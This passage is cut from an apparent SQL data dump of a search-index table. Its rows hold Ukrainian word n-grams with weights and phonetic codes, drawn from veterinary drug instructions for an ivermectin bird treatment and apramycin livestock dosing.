сухе','мл зберiгання сухе',0,1,1.6,'м000',1,'*'),(1555164,'можна гладити','можна гладити',0,1,1.4333,'м000',1,'*'),(1555165,'можна гладити і','можна гладити і',0,1,1.5,'м000',1,'*'),(1555166,'можна повторити','можна повторити',0,1,1.5,'м000',1,'*'),(1555167,'можна повторити через','можна повторити через',0,1,1.7,'м000',1,'*'),(1555168,'молодше','молодше',0,0,0.4667,'м000',1,'*'),(1555169,'молодше 8','молодше 8',0,1,1.3,'м000',1,'*'),(1555170,'молодше 8 тижнів','молодше 8 тижнів',0,1,1.5333,'м000',1,'*'),(1555171,'на γ-аміномасляну','на γ-аміномасляну',0,1,1.5667,'н000',1,'*'),(1555172,'на γ-аміномасляну кислоту','на γ-аміномасляну кислоту',0,1,1.8333,'н000',1,'*'),(1555173,'на голуба','на голуба',0,1,1.3,'н000',1,'*'),(1555174,'на голуба вагою','на голуба вагою',0,1,1.5,'н000',1,'*'),(1555175,'на голубавагою','на голубавагою',0,1,1.4667,'н000',1,'*'),(1555176,'на голубавагою 500','на голубавагою 500',0,1,1.6,'н000',1,'*'),(1555177,'на слизові','на слизові',0,1,1.3333,'н000',1,'*'),(1555178,'на слизові оболонки','на слизові оболонки',0,1,1.6333,'н000',1,'*'),(1555179,'на суху','на суху',0,1,1.2333,'н000',1,'*'),(1555180,'на суху та','на суху та',0,1,1.3333,'н000',1,'*'),(1555181,'на тілі','на тілі',0,1,1.2333,'н000',1,'*'),(1555182,'на тілі птиці','на тілі птиці',0,1,1.4333,'н000',1,'*'),(1555183,'на шкіру','на шкіру',0,1,1.2667,'н000',1,'*'),(1555184,'на шкіру або','на шкіру або',0,1,1.4,'н000',1,'*'),(1555185,'належить','належить',0,0,0.5333,'н000',1,'*'),(1555186,'належить до','належить до',0,1,1.3667,'н000',1,'*'),(1555187,'належить до хімічної','належить до хімічної',0,1,1.6667,'н000',1,'*'),(1555188,'наносити','наносити',0,0,0.5333,'н000',1,'*'),(1555189,'наносити на','наносити на',0,1,1.3667,'н000',1,'*'),(1555190,'наносити на суху','наносити на суху',0,1,1.5333,'н000',1,'*'),(1555191,'наступних','наступних',0,0,0.6,'н000',1,'*'),(1555192,'наступних кількостях','наступних кількостях',0,1,1.6667,'н000',1,'*'),(1555193,'наступних кількостях 1','наступних кількостях 1',0,1,1.7333,'н000',1,'*'),(1555194,'не застосовувати під','не застосовувати під',0,1,1.6667,'н000',1,'*'),(1555195,'не застосовувати птахам','не застосовувати птахам',0,1,1.7667,'н000',1,'*'),(1555196,'не застосовувати хворим','не застосовувати хворим',0,1,1.7667,'н000',1,'*'),(1555197,'не можна','не можна',0,1,1.2667,'н000',1,'*'),(1555198,'не можна гладити','не можна гладити',0,1,1.5333,'н000',1,'*'),(1555199,'не рекомендується','не рекомендується',0,1,1.5667,'н000',1,'*'),(1555200,'не рекомендується купати','не рекомендується купати',0,1,1.8,'н000',1,'*'),(1555201,'нематод діюча','нематод діюча',0,1,1.4333,'н000',1,'*'),(1555202,'нематод діюча речовина','нематод діюча речовина',0,1,1.7333,'н000',1,'*'),(1555203,'нематод що','нематод що',0,1,1.3333,'н000',1,'*'),(1555204,'нематод що призводить','нематод що призводить',0,1,1.7,'н000',1,'*'),(1555205,'нематодозах','нематодозах',0,0,0.7333,'н000',1,'*'),(1555206,'нематодозах дозування','нематодозах дозування',0,1,1.7,'н000',1,'*'),(1555207,'нематодозах дозування препарат','нематодозах дозування препарат',0,1,2,'н000',1,'*'),(1555208,'необхідно','необхідно',0,0,0.6,'н000',4,'*'),(1555209,'необхідно відразу','необхідно відразу',0,1,1.5667,'н000',1,'*'),(1555210,'необхідно відразу промити','необхідно відразу промити',0,1,1.8333,'н000',1,'*'),(1555211,'необхідно вимити','необхідно вимити',0,1,1.5333,'н000',1,'*'),(1555212,'необхідно вимити руки','необхідно вимити руки',0,1,1.7,'н000',1,'*'),(1555213,'необхідності','необхідності',0,0,0.8,'н000',1,'*'),(1555214,'необхідності процедуру','необхідності процедуру',0,1,1.7333,'н000',1,'*'),(1555215,'необхідності процедуру можна','необхідності процедуру можна',0,1,1.9333,'н000',1,'*'),(1555216,'непошкоджену','непошкоджену',0,0,0.8,'н000',1,'*'),(1555217,'непошкоджену шкіру','непошкоджену шкіру',0,1,1.6,'н000',1,'*'),(1555218,'непошкоджену шкіру між','непошкоджену шкіру між',0,1,1.7333,'н000',1,'*'),(1555219,'нервових','нервових',0,0,0.5333,'н000',1,'*'),(1555220,'нервових імпульсів','нервових імпульсів',0,1,1.6,'н000',1,'*'),(1555221,'нервових імпульсів ектопаразитів','нервових імпульсів ектопаразитів',0,1,2,'н000',1,'*'),(1555222,'нервово-м','нервово-м',0,0,0.6,'н000',1,'*'),(1555223,'нервово-м язової','нервово-м язової',0,1,1.5333,'н000',1,'*'),(1555224,'нервово-м язової передачі','нервово-м язової передачі',0,1,1.8333,'н000',1,'*'),(1555225,'нервової','нервової',0,0,0.5333,'н000',1,'*'),(1555226,'нервової або','нервової або',0,1,1.4,'н000',1,'*'),(1555227,'нервової або нервово-м','нервової або нервово-м',0,1,1.7333,'н000',1,'*'),(1555228,'оболонки','оболонки',0,0,0.5333,'о000',1,'*'),(1555229,'оболонки і','оболонки і',0,1,1.3333,'о000',1,'*'),(1555230,'оболонки і в','оболонки і в',0,1,1.4,'о000',1,'*'),(1555231,'оболонки необхідно','оболонки необхідно',0,1,1.6,'о000',1,'*'),(1555232,'оболонки необхідно відразу','оболонки необхідно відразу',0,1,1.8667,'о000',1,'*'),(1555233,'обробки','обробки',0,0,0.4667,'о000',1,'*'),(1555234,'обробки препаратом','обробки препаратом',0,1,1.6,'о000',1,'*'),(1555235,'обробки препаратом птицю','обробки препаратом птицю',0,1,1.8,'о000',1,'*'),(1555236,'обробки препаратом “івермікол”','обробки препаратом “івермікол”',0,1,2,'о000',1,'*'),(1555237,'обробки птиці','обробки птиці',0,1,1.4333,'о000',1,'*'),(1555238,'обробки птиці необхідно','обробки птиці необхідно',0,1,1.7667,'о000',1,'*'),(1555239,'обробки птиці препаратом','обробки птиці препаратом',0,1,1.8,'о000',1,'*'),(1555240,'одноразово наносити','одноразово наносити',0,1,1.6333,'о000',1,'*'),(1555241,'одноразово наносити на','одноразово наносити на',0,1,1.7333,'о000',1,'*'),(1555242,'ознак ускладнень','ознак ускладнень',0,1,1.5333,'о000',1,'*'),(1555243,'ознак ускладнень після','ознак ускладнень після',0,1,1.7333,'о000',1,'*'),(1555244,'ослабленим','ослабленим',0,0,0.6667,'о000',1,'*'),(1555245,'ослабленим птахам','ослабленим птахам',0,1,1.5667,'о000',1,'*'),(1555246,'ослабленим птахам застереження','ослабленим птахам застереження',0,1,2,'о000',1,'*'),(1555247,'основного','основного',0,0,0.6,'о000',1,'*'),(1555248,'основного сезону','основного сезону',0,1,1.5333,'о000',1,'*'),(1555249,'основного сезону линьки','основного сезону линьки',0,1,1.7667,'о000',1,'*'),(1555250,'під час основного','під час основного',0,1,1.5667,'п000',1,'*'),(1555251,'пір\'яного покриву не','пір покриву не',0,1,1.6667,'п000',1,'*'),(1555252,'після закінчення','після закінчення',0,1,1.5333,'п000',1,'*'),(1555253,'після закінчення обробки','після закінчення обробки',0,1,1.8,'п000',1,'*'),(1555254,'після обробки','після обробки',0,1,1.4333,'п000',1,'*'),(1555255,'після обробки препаратом','після обробки препаратом',0,1,1.8,'п000',1,'*'),(1555256,'після обробки птиці','після обробки птиці',0,1,1.6333,'п000',1,'*'),(1555257,'папуг','папуг',0,0,0.3333,'п000',1,'*'),(1555258,'папуг канарок','папуг канарок',0,1,1.4333,'п000',1,'*'),(1555259,'папуг канарок у','папуг канарок у',0,1,1.5,'п000',1,'*'),(1555260,'паразити','паразити',0,0,0.5333,'п000',1,'*'),(1555261,'паразити які','паразити які',0,1,1.4,'п000',1,'*'),(1555262,'паразити які паразитують','паразити які паразитують',0,1,1.8,'п000',1,'*'),(1555263,'паразитують','паразитують',0,0,0.7333,'п000',1,'*'),(1555264,'паразитують на','паразитують на',0,1,1.4667,'п000',1,'*'),(1555265,'паразитують на тілі','паразитують на тілі',0,1,1.6333,'п000',1,'*'),(1555266,'паралічу','паралічу',0,0,0.5333,'п000',1,'*'),(1555267,'паралічу і','паралічу і',0,1,1.3333,'п000',1,'*'),(1555268,'паралічу і загибелі','паралічу і загибелі',0,1,1.6333,'п000',1,'*'),(1555269,'передачі','передачі',0,0,0.5333,'п000',1,'*'),(1555270,'передачі шляхом','передачі шляхом',0,1,1.5,'п000',1,'*'),(1555271,'передачі шляхом впливу','передачі шляхом впливу',0,1,1.7333,'п000',1,'*'),(1555272,'передача','передача',0,0,0.5333,'п000',1,'*'),(1555273,'передача нервових','передача нервових',0,1,1.5667,'п000',1,'*'),(1555274,'передача нервових імпульсів','передача нервових імпульсів',0,1,1.9,'п000',1,'*'),(1555275,'по 10 мл','по 10 мл',0,1,1.2667,'п000',1,'*'),(1555276,'повного','повного',0,0,0.4667,'п000',1,'*'),(1555277,'повного висихання','повного висихання',0,1,1.5667,'п000',1,'*'),(1555278,'повного висихання пір\'яного','повного висихання пір',0,1,1.9,'п000',1,'*'),(1555279,'повторити','повторити',0,0,0.6,'п000',1,'*'),(1555280,'повторити через','повторити через',0,1,1.5,'п000',1,'*'),(1555281,'повторити через 4-6','повторити через 4-6',0,1,1.6333,'п000',1,'*'),(1555282,'покриву не','покриву не',0,1,1.3333,'п000',1,'*'),(1555283,'покриву не можна','покриву не можна',0,1,1.5333,'п000',1,'*'),(1555284,'полімерні','полімерні',0,0,0.6,'п000',1,'*'),(1555285,'полімерні флакони','полімерні флакони',0,1,1.5667,'п000',1,'*'),(1555286,'полімерні флакони по','полімерні флакони по',0,1,1.6667,'п000',1,'*'),(1555287,'полягає','полягає',0,0,0.4667,'п000',2,'*'),(1555288,'полягає у','полягає у',0,1,1.3,'п000',2,'*'),(1555289,'полягає у блокаді','полягає у блокаді',0,1,1.5667,'п000',1,'*'),(1555290,'попаданні','попаданні',0,0,0.6,'п000',1,'*'),(1555291,'попаданні препарату','попаданні препарату',0,1,1.6333,'п000',1,'*'),(1555292,'попаданні препарату на','попаданні препарату на',0,1,1.7333,'п000',1,'*'),(1555293,'попаданню','попаданню',0,0,0.6,'п000',1,'*'),(1555294,'попаданню препарату','попаданню препарату',0,1,1.6333,'п000',1,'*'),(1555295,'попаданню препарату на','попаданню препарату на',0,1,1.7333,'п000',1,'*'),(1555296,'порушується','порушується',0,0,0.7333,'п000',1,'*'),(1555297,'порушується передача','порушується передача',0,1,1.6667,'п000',1,'*'),(1555298,'порушується передача нервових','порушується передача нервових',0,1,1.9667,'п000',1,'*'),(1555299,'появі','появі',0,0,0.3333,'п000',1,'*'),(1555300,'появі клінічних','появі клінічних',0,1,1.5,'п000',1,'*'),(1555301,'появі клінічних ознак','появі клінічних ознак',0,1,1.7,'п000',1,'*'),(1555302,'препарат застосовувати','препарат застосовувати',0,1,1.7333,'п000',1,'*'),(1555303,'препарат застосовувати зовнішньо','препарат застосовувати зовнішньо',0,1,2,'п000',1,'*'),(1555304,'препарат містить діючу','препарат містить діючу',0,1,1.7333,'п000',1,'*'),(1555305,'препарат має','препарат має',0,1,1.4,'п000',1,'*'),(1555306,'препарат має широкий','препарат має широкий',0,1,1.6667,'п000',1,'*'),(1555307,'препаратом','препаратом',0,0,0.6667,'п000',2,'*'),(1555308,'препаратом звернутися','препаратом звернутися',0,1,1.7,'п000',1,'*'),(1555309,'препаратом звернутися до','препаратом звернутися до',0,1,1.8,'п000',1,'*'),(1555310,'препаратом птицю','препаратом птицю',0,1,1.5333,'п000',1,'*'),(1555311,'препаратом птицю не','препаратом птицю не',0,1,1.6333,'п000',1,'*'),(1555312,'препаратом “івермікол”','препаратом “івермікол”',0,1,1.7333,'п000',1,'*'),(1555313,'препаратом “івермікол” гинуть','препаратом “івермікол” гинуть',0,1,1.9667,'п000',1,'*'),(1555314,'препарату івермектин','препарату івермектин',0,1,1.6667,'п000',1,'*'),(1555315,'препарату івермектин належить','препарату івермектин належить',0,1,1.9667,'п000',1,'*'),(1555316,'препарату на слизові','препарату на слизові',0,1,1.6667,'п000',1,'*'),(1555317,'препарату на шкіру','препарату на шкіру',0,1,1.6,'п000',1,'*'),(1555318,'препарату триває','препарату триває',0,1,1.5333,'п000',1,'*'),(1555319,'препарату триває до','препарату триває до',0,1,1.6333,'п000',1,'*'),(1555320,'при випадковому','при випадковому',0,1,1.5,'п000',1,'*'),(1555321,'при випадковому попаданні','при випадковому попаданні',0,1,1.8333,'п000',1,'*'),(1555322,'при кишкових','при кишкових',0,1,1.4,'п000',1,'*'),(1555323,'при кишкових нематодозах','при кишкових нематодозах',0,1,1.8,'п000',1,'*'),(1555324,'при появі','при появі',0,1,1.3,'п000',1,'*'),(1555325,'при появі клінічних','при появі клінічних',0,1,1.6333,'п000',1,'*'),(1555326,'при ураженні','при ураженні',0,1,1.4,'п000',1,'*'),(1555327,'при ураженні ектопаразитами','при ураженні ектопаразитами',0,1,1.9,'п000',1,'*'),(1555328,'призводить','призводить',0,0,0.6667,'п000',1,'*'),(1555329,'призводить до','призводить до',0,1,1.4333,'п000',1,'*'),(1555330,'призводить до їх','призводить до їх',0,1,1.5333,'п000',1,'*'),(1555331,'промити','промити',0,0,0.4667,'п000',1,'*'),(1555332,'промити їх','промити їх',0,1,1.3333,'п000',1,'*'),(1555333,'промити їх проточною','промити їх проточною',0,1,1.6667,'п000',1,'*'),(1555334,'протипаразитарної','протипаразитарної',0,0,1,'п000',1,'*'),(1555335,'протипаразитарної дії','протипаразитарної дії',0,1,1.7,'п000',1,'*'),(1555336,'протипаразитарної дії активний','протипаразитарної дії активний',0,1,2,'п000',1,'*'),(1555337,'проточною','проточною',0,0,0.6,'п000',1,'*'),(1555338,'проточною водою','проточною водою',0,1,1.5,'п000',1,'*'),(1555339,'проточною водою після','проточною водою після',0,1,1.7,'п000',1,'*'),(1555340,'протягом 2 годин','протягом 2 годин',0,1,1.5333,'п000',1,'*'),(1555341,'профілактика','профілактика',0,0,0.8,'п000',2,'*'),(1555342,'профілактика голубів','профілактика голубів',0,1,1.6667,'п000',1,'*'),(1555343,'профілактика голубів та','профілактика голубів та',0,1,1.7667,'п000',1,'*'),(1555344,'процедуру','процедуру',0,0,0.6,'п000',1,'*'),(1555345,'процедуру можна','процедуру можна',0,1,1.5,'п000',1,'*'),(1555346,'процедуру можна повторити','процедуру можна повторити',0,1,1.8333,'п000',1,'*'),(1555347,'птахів папуг','птахів папуг',0,1,1.4,'п000',1,'*'),(1555348,'птахів папуг канарок','птахів папуг канарок',0,1,1.6667,'п000',1,'*'),(1555349,'птахів при ураженні','птахів при ураженні',0,1,1.6333,'п000',1,'*'),(1555350,'птахам','птахам',0,0,0.4,'п000',1,'*'),(1555351,'птахам застереження','птахам застереження',0,1,1.6333,'п000',1,'*'),(1555352,'птахам застереження запобігати','птахам застереження запобігати',0,1,2,'п000',1,'*'),(1555353,'птахам молодше','птахам молодше',0,1,1.4667,'п000',1,'*'),(1555354,'птахам молодше 8','птахам молодше 8',0,1,1.5333,'п000',1,'*'),(1555355,'птиці в','птиці в',0,1,1.2333,'п000',1,'*'),(1555356,'птиці в наступних','птиці в наступних',0,1,1.5667,'п000',1,'*'),(1555357,'птиці необхідно','птиці необхідно',0,1,1.5,'п000',1,'*'),(1555358,'птиці необхідно вимити','птиці необхідно вимити',0,1,1.7333,'п000',1,'*'),(1555359,'птиці після','птиці після',0,1,1.3667,'п000',1,'*'),(1555360,'птиці після обробки','птиці після обробки',0,1,1.6333,'п000',1,'*'),(1555361,'птиці препаратом','птиці препаратом',0,1,1.5333,'п000',1,'*'),(1555362,'птиці препаратом звернутися','птиці препаратом звернутися',0,1,1.9,'п000',1,'*'),(1555363,'птицю','птицю',0,0,0.3333,'п000',1,'*'),(1555364,'птицю не','птицю не',0,1,1.2667,'п000',1,'*'),(1555365,'птицю не рекомендується','птицю не рекомендується',0,1,1.7667,'п000',1,'*'),(1555366,'пухопероїдів','пухопероїдів',0,0,0.8,'п000',1,'*'),(1555367,'пухопероїдів та','пухопероїдів та',0,1,1.5,'п000',1,'*'),(1555368,'пухопероїдів та кишкових','пухопероїдів та кишкових',0,1,1.8,'п000',1,'*'),(1555369,'пухопероїдами','пухопероїдами',0,0,0.8667,'п000',1,'*'),(1555370,'пухопероїдами та','пухопероїдами та',0,1,1.5333,'п000',1,'*'),(1555371,'пухопероїдами та при','пухопероїдами та при',0,1,1.6667,'п000',1,'*'),(1555372,'разі','разі',0,0,0.2667,'р000',3,'*'),(1555373,'разі необхідності','разі необхідності',0,1,1.5667,'р000',1,'*'),(1555374,'разі необхідності процедуру','разі необхідності процедуру',0,1,1.9,'р000',1,'*'),(1555375,'рекомендується купати','рекомендується купати',0,1,1.7,'р000',1,'*'),(1555376,'рекомендується купати протягом','рекомендується купати протягом',0,1,2,'р000',1,'*'),(1555377,'речовина препарату','речовина препарату',0,1,1.6,'р000',1,'*'),(1555378,'речовина препарату івермектин','речовина препарату івермектин',0,1,1.9667,'р000',1,'*'),(1555379,'речовину','речовину',0,0,0.5333,'р000',2,'*'),(1555380,'речовину івермектин','речовину івермектин',0,1,1.6333,'р000',1,'*'),(1555381,'речовину івермектин фармакологічні','речовину івермектин фармакологічні',0,1,2,'р000',1,'*'),(1555382,'роки виробник','роки виробник',0,1,1.4333,'р000',1,'*'),(1555383,'роки виробник готового','роки виробник готового',0,1,1.7333,'р000',1,'*'),(1555384,'руки','руки',0,0,0.2667,'р000',2,'*'),(1555385,'руки з','руки з',0,1,1.2,'р000',1,'*'),(1555386,'руки з милом','руки з милом',0,1,1.4,'р000',1,'*'),(1555387,'сезону линьки','сезону линьки',0,1,1.4333,'с000',1,'*'),(1555388,'сезону линьки не','сезону линьки не',0,1,1.5333,'с000',1,'*'),(1555389,'слизові','слизові',0,0,0.4667,'с000',1,'*'),(1555390,'слизові оболонки','слизові оболонки',0,1,1.5333,'с000',1,'*'),(1555391,'слизові оболонки і','слизові оболонки і',0,1,1.6,'с000',1,'*'),(1555392,'слизові оболонки необхідно','слизові оболонки необхідно',0,1,1.8667,'с000',1,'*'),(1555393,'спектр протипаразитарної','спектр протипаразитарної',0,1,1.8,'с000',1,'*'),(1555394,'спектр протипаразитарної дії','спектр протипаразитарної дії',0,1,1.9333,'с000',1,'*'),(1555395,'суху','суху',0,0,0.2667,'с000',1,'*'),(1555396,'суху та','суху та',0,1,1.2333,'с000',1,'*'),(1555397,'суху та непошкоджену','суху та непошкоджену',0,1,1.6667,'с000',1,'*'),(1555398,'тілі','тілі',0,0,0.2667,'т000',1,'*'),(1555399,'тілі птиці','тілі птиці',0,1,1.3333,'т000',1,'*'),(1555400,'тілі птиці після','тілі птиці після',0,1,1.5333,'т000',1,'*'),(1555401,'та кишкових','та кишкових',0,1,1.3667,'т000',1,'*'),(1555402,'та кишкових нематод','та кишкових нематод',0,1,1.6333,'т000',1,'*'),(1555403,'та непошкоджену','та непошкоджену',0,1,1.5,'т000',1,'*'),(1555404,'та непошкоджену шкіру','та непошкоджену шкіру',0,1,1.7,'т000',1,'*'),(1555405,'та ослабленим','та ослабленим',0,1,1.4333,'т000',1,'*'),(1555406,'та ослабленим птахам','та ослабленим птахам',0,1,1.6667,'т000',1,'*'),(1555407,'та при','та при',0,1,1.2,'т000',1,'*'),(1555408,'та при кишкових','та при кишкових',0,1,1.5,'т000',1,'*'),(1555409,'тижнів або','тижнів або',0,1,1.3333,'т000',1,'*'),(1555410,'тижнів або вагою','тижнів або вагою',0,1,1.5333,'т000',1,'*'),(1555411,'тижнів протипоказання','тижнів протипоказання',0,1,1.7,'т000',1,'*'),(1555412,'тижнів протипоказання не','тижнів протипоказання не',0,1,1.8,'т000',1,'*'),(1555413,'травний','травний',0,0,0.4667,'т000',1,'*'),(1555414,'травний канал','травний канал',0,1,1.4333,'т000',1,'*'),(1555415,'травний канал при','травний канал при',0,1,1.5667,'т000',1,'*'),(1555416,'триває','триває',0,0,0.4,'т000',2,'*'),(1555417,'триває до','триває до',0,1,1.3,'т000',1,'*'),(1555418,'триває до 30','триває до 30',0,1,1.4,'т000',1,'*'),(1555419,'у блокаді','у блокаді',0,1,1.3,'у000',1,'*'),(1555420,'у блокаді нервової','у блокаді нервової',0,1,1.6,'у000',1,'*'),(1555421,'у разі','у разі',0,1,1.2,'у000',2,'*'),(1555422,'у разі необхідності','у разі необхідності',0,1,1.6333,'у000',1,'*'),(1555423,'ураженні','ураженні',0,0,0.5333,'у000',1,'*'),(1555424,'ураженні ектопаразитами','ураженні ектопаразитами',0,1,1.7667,'у000',1,'*'),(1555425,'ураженні ектопаразитами кліщами','ураженні ектопаразитами кліщами',0,1,2,'у000',1,'*'),(1555426,'ускладнень','ускладнень',0,0,0.6667,'у000',1,'*'),(1555427,'ускладнень після','ускладнень після',0,1,1.5333,'у000',1,'*'),(1555428,'ускладнень після обробки','ускладнень після обробки',0,1,1.8,'у000',1,'*'),(1555429,'фармакологічні властивості атсvet','фармакологічні властивості атсvet',0,1,2,'ф130',1,'*'),(1555430,'фармакологічна','фармакологічна',0,0,0.9333,'ф000',1,'*'),(1555431,'фармакологічна дія','фармакологічна дія',0,1,1.6,'ф000',1,'*'),(1555432,'фармакологічна дія івермектину','фармакологічна дія івермектину',0,1,2,'ф000',1,'*'),(1555433,'флакони','флакони',0,0,0.4667,'ф000',1,'*'),(1555434,'флакони по','флакони по',0,1,1.3333,'ф000',1,'*'),(1555435,'флакони по 10','флакони по 10',0,1,1.4333,'ф000',1,'*'),(1555436,'форма випуску полімерні','форма випуску полімерні',0,1,1.7667,'ф000',1,'*'),(1555437,'хімічної','хімічної',0,0,0.5333,'х000',1,'*'),(1555438,'хімічної групи','хімічної групи',0,1,1.4667,'х000',1,'*'),(1555439,'хімічної групи макроциклічних','хімічної групи макроциклічних',0,1,1.9667,'х000',1,'*'),(1555440,'хворим','хворим',0,0,0.4,'х000',1,'*'),(1555441,'хворим та','хворим та',0,1,1.3,'х000',1,'*'),(1555442,'хворим та ослабленим','хворим та ослабленим',0,1,1.6667,'х000',1,'*'),(1555443,'час основного','час основного',0,1,1.4333,'ч000',1,'*'),(1555444,'час основного сезону','час основного сезону',0,1,1.6667,'ч000',1,'*'),(1555445,'через 2-3','через 2-3',0,1,1.3,'ч000',1,'*'),(1555446,'через 2-3 доби','через 2-3 доби',0,1,1.4667,'ч000',1,'*'),(1555447,'чого порушується','чого порушується',0,1,1.5333,'ч000',1,'*'),(1555448,'чого порушується передача','чого порушується передача',0,1,1.8333,'ч000',1,'*'),(1555449,'широкий','широкий',0,0,0.4667,'ш000',1,'*'),(1555450,'широкий спектр','широкий спектр',0,1,1.4667,'ш000',1,'*'),(1555451,'широкий спектр протипаразитарної','широкий спектр протипаразитарної',0,1,2,'ш000',1,'*'),(1555452,'шкіру','шкіру',0,0,0.3333,'ш000',1,'*'),(1555453,'шкіру або','шкіру або',0,1,1.3,'ш000',1,'*'),(1555454,'шкіру або слизові','шкіру або слизові',0,1,1.5667,'ш000',1,'*'),(1555455,'шкіру між','шкіру між',0,1,1.3,'ш000',1,'*'),(1555456,'шкіру між лопатками','шкіру між лопатками',0,1,1.6333,'ш000',1,'*'),(1555457,'шляхом','шляхом',0,0,0.4,'ш000',1,'*'),(1555458,'шляхом впливу','шляхом впливу',0,1,1.4333,'ш000',1,'*'),(1555459,'шляхом впливу на','шляхом впливу на',0,1,1.5333,'ш000',1,'*'),(1555460,'що призводить','що призводить',0,1,1.4333,'щ000',1,'*'),(1555461,'що призводить до','що призводить до',0,1,1.5333,'щ000',1,'*'),(1555462,'язової','язової',0,0,0.4,'я000',1,'*'),(1555463,'язової передачі','язової передачі',0,1,1.5,'я000',1,'*'),(1555464,'язової передачі шляхом','язової передачі шляхом',0,1,1.7333,'я000',1,'*'),(1555465,'які паразитують','які паразитують',0,1,1.5,'я000',1,'*'),(1555466,'які паразитують на','які паразитують на',0,1,1.6,'я000',1,'*'),(1555467,'“івермікол”','“івермікол”',0,0,0.7333,'“000',1,'*'),(1555468,'“івермікол” гинуть','“івермікол” гинуть',0,1,1.6,'“000',1,'*'),(1555469,'“івермікол” гинуть через','“івермікол” гинуть через',0,1,1.8,'“000',1,'*'),(1555877,'.coli','.coli',0,0,0.3333,'C400',1,'*'),(1555878,'.coli vibrio','.coli vibrio',0,1,1.4,'C416',1,'*'),(1555879,'.coli vibrio coli','.coli vibrio coli',0,1,1.5667,'C41624',1,'*'),(1555880,'0,5-1','0,5-1',0,0,0.5,'',1,'*'),(1555881,'0,5-1 г','0,5-1 г',0,1,1.2333,'г000',1,'*'),(1555882,'0,5-1 г препарату','0,5-1 г препарату',0,1,1.5667,'г000',1,'*'),(1555883,'1 г препарату','1 г препарату',0,1,1.4333,'г000',1,'*'),(1555884,'1 кг корму','1 кг корму',0,1,1.3333,'к000',1,'*'),(1555885,'1 кг маси','1 кг маси',0,1,1.3,'к000',1,'*'),(1555886,'1 л питноi\'','1 л питноi',0,1,1.3667,'л000',1,'*'),(1555887,'1 л питної','1 л питної',0,1,1.3333,'л000',1,'*'),(1555888,'1 сальмонельоз','1 сальмонельоз',0,1,1.4667,'с000',1,'*'),(1555889,'1 сальмонельоз що','1 сальмонельоз що',0,1,1.5667,'с000',1,'*'),(1555890,'1 створюе','1 створюе',0,1,1.3,'с000',1,'*'),(1555891,'1 створюе високi','1 створюе високi',0,1,1.5333,'с000',1,'*'),(1555892,'10-15','10-15',0,0,0.5,'',2,'*'),(1555893,'10-15 мг','10-15 мг',0,1,1.2667,'м000',1,'*'),(1555894,'10-15 мг діючої','10-15 мг діючої',0,1,1.5,'м000',1,'*'),(1555895,'10-20','10-20',0,0,0.5,'',1,'*'),(1555896,'10-20 мг','10-20 мг',0,1,1.2667,'м000',1,'*'),(1555897,'10-20 мг апрам1цину','10-20 мг апрам1цину',0,1,1.6333,'м000',1,'*'),(1555898,'100 g','100 g',0,1,1.1667,'G000',1,'*'),(1555899,'100 g huvepharma','100 g huvepharma',0,1,1.5333,'G165',1,'*'),(1555900,'100 г huvepharma','100 г huvepharma',0,1,1.5333,'г165',1,'*'),(1555901,'100 г вкриті','100 г вкриті',0,1,1.4,'г000',1,'*'),(1555902,'100-200','100-200',0,0,0.7,'',1,'*'),(1555903,'100-200 мг','100-200 мг',0,1,1.3333,'м000',1,'*'),(1555904,'100-200 мг препарату','100-200 мг препарату',0,1,1.6667,'м000',1,'*'),(1555905,'120','120',0,0,0.3,'',2,'*'),(1555906,'120 дiб','120 дiб',0,1,1.2333,'д000',1,'*'),(1555907,'120 дiб 500-1000','120 дiб 500-1000',0,1,1.5333,'д000',1,'*'),(1555908,'120 дiб лiкування','120 дiб лiкування',0,1,1.5667,'д000',1,'*'),(1555909,'13','13',0,0,0.2,'',1,'*'),(1555910,'13 встановленим','13 встановленим',0,1,1.5,'в000',1,'*'),(1555911,'13 встановленим захисним','13 встановленим захисним',0,1,1.8,'в000',1,'*'),(1555912,'13 поліетилену','13 поліетилену',0,1,1.4667,'п000',1,'*'),(1555913,'13 поліетилену низької','13 поліетилену низької',0,1,1.7333,'п000',1,'*'),(1555914,'2 роки готовий','2 роки готовий',0,1,1.4667,'р000',1,'*'),(1555915,'2 с','2 с',0,1,1.1,'с000',1,'*'),(1555916,'2 с до','2 с до',0,1,1.2,'с000',1,'*'),(1555917,'20-40','20-40',0,0,0.5,'',1,'*'),(1555918,'20-40 мг','20-40 мг',0,1,1.2667,'м000',1,'*'),(1555919,'20-40 мг апрам1цину','20-40 мг апрам1цину',0,1,1.6333,'м000',1,'*'),(1555920,'20-40 мгпрепарату','20-40 мгпрепарату',0,1,1.5667,'м000',1,'*'),(1555921,'20-40 мгпрепарату на','20-40 мгпрепарату на',0,1,1.6667,'м000',1,'*'),(1555922,'2464','2464',0,0,0.4,'',1,'*'),(1555923,'25-50','25-50',0,0,0.5,'',1,'*'),(1555924,'25-50 мг','25-50 мг',0,1,1.2667,'м000',1,'*'),(1555925,'25-50 мг діючої','25-50 мг діючої',0,1,1.5,'м000',1,'*'),(1555926,'250-500','250-500',0,0,0.7,'',1,'*'),(1555927,'250-500 мг','250-500 мг',0,1,1.3333,'м000',1,'*'),(1555928,'250-500 мг апрам1цину','250-500 мг апрам1цину',0,1,1.7,'м000',1,'*'),(1555929,'250-500 мг апраміцину','250-500 мг апраміцину',0,1,1.7,'м000',1,'*'),(1555930,'28','28',0,0,0.2,'',1,'*'),(1555931,'28 діб','28 діб',0,1,1.2,'д000',1,'*'),(1555932,'28 діб телята','28 діб телята',0,1,1.4333,'д000',1,'*'),(1555933,'3 бета-лактамними','3 бета-лактамними',0,1,1.5667,'б000',1,'*'),(1555934,'3 бета-лактамними антибіотиками','3 бета-лактамними антибіотиками',0,1,2,'б000',1,'*'),(1555935,'3 діб','3 діб',0,1,1.1667,'д000',1,'*'),(1555936,'3 діб за','3 діб за',0,1,1.2667,'д000',1,'*'),(1555937,'3 м1сяцiв','3 м1сяцiв',0,1,1.3,'м000',1,'*'),(1555938,'3 м1сяцiв 20-40','3 м1сяцiв 20-40',0,1,1.5,'м000',1,'*'),(1555939,'3 м1сяцiв лiкування','3 м1сяцiв лiкування',0,1,1.6333,'м000',1,'*'),(1555940,'3 мiсяц1в','3 мiсяц1в',0,1,1.3,'м000',1,'*'),(1555941,'3 мiсяц1в 40-80','3 мiсяц1в 40-80',0,1,1.5,'м000',1,'*'),(1555942,'3 питною','3 питною',0,1,1.2667,'п000',1,'*'),(1555943,'3 питною водою','3 питною водою',0,1,1.4667,'п000',1,'*'),(1555944,'3 препаратом','3 препаратом',0,1,1.4,'п000',1,'*'),(1555945,'3 препаратом необхідно','3 препаратом необхідно',0,1,1.7333,'п000',1,'*'),(1555946,'3 тижнів','3 